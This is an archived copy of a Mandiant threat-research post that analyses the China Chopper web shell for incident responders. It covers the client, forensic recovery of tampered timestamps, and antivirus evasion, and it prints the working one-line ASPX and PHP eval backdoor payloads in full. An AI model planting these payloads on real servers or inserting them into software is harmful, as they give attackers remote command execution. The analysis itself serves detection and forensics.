{
	"id": "89591607-5b87-4732-893f-f25613f25192",
	"created_at": "2026-04-06T00:13:49.284634Z",
	"updated_at": "2026-04-10T13:13:03.072332Z",
	"deleted_at": null,
	"sha1_hash": "85381dbf6655d4ef861912149802430b9e74d0ac",
	"title": "Breaking Down the China Chopper Web Shell - Part I | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 541347,
	"plain_text": "Breaking Down the China Chopper Web Shell - Part I | Mandiant\r\nBy Mandiant\r\nPublished: 2013-08-07 · Archived: 2026-04-05 15:16:43 UTC\r\nWritten by: Tony Lee, Ian Ahl, Dennis Hanzlik\r\nPart I in a two-part series.\r\nChina Chopper: The Little Malware That Could\r\nChina Chopper is a slick little web shell that does not get enough exposure and credit for its stealth. Other than a\r\ngood blog post from security researcher Keith Tyler, we could find little useful information on China Chopper\r\nwhen we ran across it during an incident response engagement. So to contribute something new to the public\r\nknowledge base — especially for those who happen to find the China Chopper server-side payload on one of their\r\nWeb servers — we studied the components, capabilities, payload attributes, and the detection rate of this 4\r\nkilobyte menace.\r\nComponents\r\nChina Chopper is a fairly simple backdoor in terms of components. It has two key components:the Web shell\r\ncommand-and-control (CnC) client binary and a text-based Web shell payload (server component). The text-based\r\npayload is so simple and short that an attacker could type it by hand right on the target server — no file transfer\r\nneeded.\r\nWeb Shell Client\r\nThe Web shell client used to be available on www.maicaidao.com, but we would advise against visiting that site\r\nnow.\r\nWeb shell (CnC) Client MD5 Hash\r\ncaidao.execaidao.exe 5001ef50c7e869253a7c152a638eab8a5001ef50c7e869253a7c152a638eab8a\r\nThe client binary is packed with UPX and is 220,672 bytes in size, as shown in Figure 1.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 1 of 15\n\nFigure 1: Client binary viewed in WinHex\r\nUsing the executable file compressor UPX to unpack the binary allows us to see some of the details that were\r\nhidden by the packer.\r\nC:\\Documents and Settings\\Administrator\\Desktop\u003eupx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exe\r\nUltimate Packer for eXecutables\r\nCopyright (C) 1996 - 2011 UPX 3.08w Markus Oberhumer, Laszlo Molnar \u0026 John Reiser Dec 12th 2011 File size Ratio\r\n700416 \u003c- 220672 31.51% win32/pe decomp.exe Unpacked 1 file.\r\nUsing PEiD (a free tool for detecting packers, cryptors and compilers found in PE executable files), we see that\r\nthe unpacked client binary was written in Microsoft Visual C++ 6.0, as shown in Figure 2.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 2 of 15\n\nFigure 2: PEiD reveals that the binary was written using Visual C++ 6.0\r\nBecause the strings are not encoded, examining the printable strings in the unpacked binary provides insight into\r\nhow the backdoor communicates. We were intrigued to see a reference to google.com.hk using the Chinese\r\n(simplified) language parameter (Figure 3) as well as references to the text “Chopper\" (Figure 4).\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 3 of 15\n\nFigure 4: References to Chopper in the client binary\r\nSo we have highlighted some attributes of the client binary. But what does it look like in use? China Chopper is a\r\nmenu-driven GUI full of convenient attack and victim-management features. Upon opening the client, you see\r\nexample shell entries that point to www.maicaidao.com, which originally hosted components of the Web shell.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 4 of 15\n\nTo add your own target, right click within the client, select “Add” and enter the target IP address, password, and\r\nencoding as shown in Figure 5.\r\nFigure 5: Picture of the China Chopper Web shell client binary\r\nServer-side Payload Component\r\nBut the client is only half of the remote access tool — and not likely the part you would find on your network. Its\r\ncommunication relies on a payload in the form of a small Web application. This payload is available in a variety of\r\nlanguages such as ASP, ASPX, PHP, JSP, and CFM. Some of the original files that were available for download\r\nare shown with their MD5 hashes:\r\nWeb shell Payload MD5 Hash\r\nCustomize.aspxCustomize.aspx 8aa603ee2454da64f4c70f24cc0b5e088aa603ee2454da64f4c70f24cc0b5e08\r\nCustomize.cfmCustomize.cfm ad8288227240477a95fb023551773c84ad8288227240477a95fb023551773c84\r\nCustomize.jspCustomize.jsp acba8115d027529763ea5c7ed6621499acba8115d027529763ea5c7ed6621499\r\nSource: http://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html\r\nEven though the MD5s are useful, keep in mind that this is a text-based payload that can be easily changed,\r\nresulting in a new MD5 hash. We will discuss the payload attributes later, but here is an example of just one of the\r\ntext-based payloads:\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 5 of 15\n\nASPX:\r\n\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%eval(Request.Item[\"password\"],\"unsafe\");%\u003e\r\nNote that “password” would be replaced with the actual password to be used in the client component when\r\nconnecting to the Web shell.\r\nIn the next post, we provide regular expressions that can be used to find instances of this Web shell.\r\nCapabilities\r\nThe capabilities of both the payload and the client are impressive considering their size. The Web shell client\r\ncontains a “Security Scan” feature, independent of the payload, which gives the attacker the ability to spider and\r\nuse brute force password guessing against authentication portals.\r\nFigure 6: China Chopper provides a “Security Scan” feature\r\nIn addition to vulnerability hunting, this Web shell has excellent CnC features when combining the client and\r\npayload, include the following:\r\nFile Management (File explorer)\r\nDatabase Management (DB client)\r\nVirtual Terminal (Command shell)\r\nIn China Chopper's main window, right-clicking one of the target URLs brings up a list of possible actions (see\r\nFigure 7).\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 6 of 15\n\nFigure 7: Screenshot of the CnC client showing capabilities of the Web shell\r\nFile Management\r\nUsed as a remote access tool (RAT), China Chopper makes file management simple. Abilities include uploading\r\nand downloading files to and from the victim, using the file-retrieval tool wget to download files from the Web to\r\nthe target, editing, deleting, copying, renaming, and even changing the timestamp of the files.\r\nFigure 8: File Management provides an easy to use menu that is activated by right-clicking on a file name\r\nSo just how stealthy is the “Modify the file time” option? Figure 9 shows the timestamps of the three files in the\r\ntest directory before the Web shell modifies the timestamps. By default, Windows Explorer shows only the “Date\r\nModified” field. So normally, our Web shell easily stands out because it is newer than the other two files.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 7 of 15\n\nFigure 9: IIS directory showing time stamps prior to the time modification\r\nFigure 10 shows the date of the file after the Web shell modifies the timestamp. The modified time on our Web\r\nshell shows up as the same as the other two files. Because this is the default field displayed to users, it easily\r\nblends in to the untrained eye — especially with many files in the directory.\r\nFigure 10: IIS directory showing time stamps after the time modification\r\nClever investigators may think that they can spot the suspicious file due to the creation date being changed to the\r\nsame date as the modified date. But this is not necessarily anomalous. Additionally, even if the file is detected, the\r\nforensic timeline would be skewed because the date that the attacker planted the file is no longer present. To find\r\nthe real date the file was planted, you need to go to the Master File Table (MFT). After acquiring the MFT using\r\nFTK, EnCase, or other means, we recommend using mftdump (available from http://malware-hunters.net/all-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 8 of 15\n\ndownloads/). Written by FireEye researcher Mike Spohn, mftdump is a great tool for extracting and analyzing file\r\nmetadata.\r\nThe following table shows the timestamps pulled from the MFT for our Web shell file. We pulled the timestamps\r\nbefore and after the timestamps were modified. Notice that the “fn*” fields retain their original times, thus all is\r\nnot lost for the investigator!\r\nCategory Pre-touch match Post-touch match\r\nsiCreateTime (UTC)siCreateTime (UTC)\r\n6/6/2013 16:016/6/2013\r\n16:01\r\n2/21/2003 22:482/21/2003\r\n22:48\r\nsiAccessTime (UTC)siAccessTime (UTC)\r\n6/20/2013 1:416/20/2013\r\n1:41\r\n6/25/2013 18:566/25/2013\r\n18:56\r\nsiModTime (UTC)siModTime (UTC) 6/7/2013 0:336/7/2013 0:33\r\n2/21/2003 22:482/21/2003\r\n22:48\r\nsiMFTModTime (UTC)siMFTModTime\r\n(UTC)\r\n6/20/2013 1:546/20/2013\r\n1:54\r\n6/25/2013 18:566/25/2013\r\n18:56\r\nfnCreateTime (UTC)fnCreateTime (UTC)\r\n6/6/2013 16:016/6/2013\r\n16:01\r\n6/6/2013 16:016/6/2013\r\n16:01\r\nfnAccessTime (UTC)fnAccessTime (UTC)\r\n6/6/2013 16:036/6/2013\r\n16:03\r\n6/6/2013 16:036/6/2013\r\n16:03\r\nfnModTime (UTC)fnModTime (UTC)\r\n6/4/2013 15:426/4/2013\r\n15:42\r\n6/4/2013 15:426/4/2013\r\n15:42\r\nfnMFTModTime (UTC)fnMFTModTime\r\n(UTC)\r\n6/6/2013 16:046/6/2013\r\n16:04\r\n6/6/2013 16:046/6/2013\r\n16:04\r\nDatabase Management\r\nThe Database Management functionality is impressive and helpful to the first-time user. Upon configuring the\r\nclient, China Chopper provides example connection syntax.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 9 of 15\n\nFigure 11: Database Management requires simple configuration parameters to connect\r\nAfter connecting, China Chopper also provides helpful SQL commands that you may want to run.\r\nFigure 12: Database Management provides the ability to interact with a database and even provides helpful\r\nprepopulated commands\r\nCommand Shell Access\r\nFinally, command shell access is provided for that OS level interaction you crave. What a versatile little Web\r\nshell!\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 10 of 15\n\nFigure 13: Virtual Terminal provides a command shell for OS interaction\r\nPayload Attributes\r\nWe stated above that this backdoor is stealthy due to a number of factors including the following:\r\nSize\r\nServer-side content\r\nClient-side content\r\nAV detection rate\r\nSize\r\nLegitimate and illegitimate software usually suffer from the same principle: more features equals more code,\r\nwhich equals larger size. Considering how many features this Web shell contains, it is incredibly small — just 73\r\nbytes for the aspx version, or 4 kilobytes on disk (see Figure 14). Compare that to other Web shells such as\r\nLaudanum (619 bytes) or RedTeam Pentesting (8,527 bytes). China Chopper is so small and simple that you could\r\nconceivably type the contents of the shell by hand.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 11 of 15\n\nFigure 14: China Chopper file properties\r\nServer-Side Content\r\nThe server side content could easily be overlooked among the other files associated with a vanilla install of a\r\ncomplex application. The code does not look too evil in nature, but is curious.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 12 of 15\n\nFigure 15: The content of the file seems relatively benign, especially if you add a warm and fuzzy word like\r\nSecurity as the shell password\r\nBelow are the contents of the Web shell for two of its varieties.\r\nASPX:\r\n \u003c%@ Page Language=\"Jscript\"%\u003e\u003c%eval(Request.Item[\"password\"],\"unsafe\");%\u003e\r\nPHP:\r\n \u003c?php @eval($_POST['password']);?\u003e\r\nClient-Side Content\r\nBecause all of the code is server-side language that does not generate any client-side code, browsing to the Web\r\nshell and viewing the source as a client reveals nothing.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 13 of 15\n\nFigure 16: Viewing the source of the web shell reveals nothing to the client\r\nAnti-virus Detection Rate\r\nRunning the Web shell through the virus-scanning website No Virus Thanks shows a detection rate of 0 out of 14,\r\nindicating that most, if not all, anti-virus tools would miss the Web shell on an infected system.\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 14 of 15\n\nFigure 17: Results of multiple anti-virus engine inspections showing China Chopper coming up clean\r\nThe same holds true for VirusTotal. None of its 47 anti-virus engines flags China Chopper as malicious.\r\nFigure 18: Results of multiple AV engine inspections showing the Web shell comes up clean\r\nConclusion\r\nWe hope that this post has advanced the understanding of this compact, flexible, and stealthy Web shell. If you are\r\nreading this, you may be facing China Chopper right now — if so, we wish you success in eradicating this pest. In\r\nPart II, we examine the platform China Chopper runs on and describe its delivery mechanisms, traffic analysis and\r\ndetection.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nhttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html"
	],
	"report_names": [
		"breaking-down-the-china-chopper-web-shell-part-i.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434429,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85381dbf6655d4ef861912149802430b9e74d0ac.pdf",
		"text": "https://archive.orkl.eu/85381dbf6655d4ef861912149802430b9e74d0ac.txt",
		"img": "https://archive.orkl.eu/85381dbf6655d4ef861912149802430b9e74d0ac.jpg"
	}
}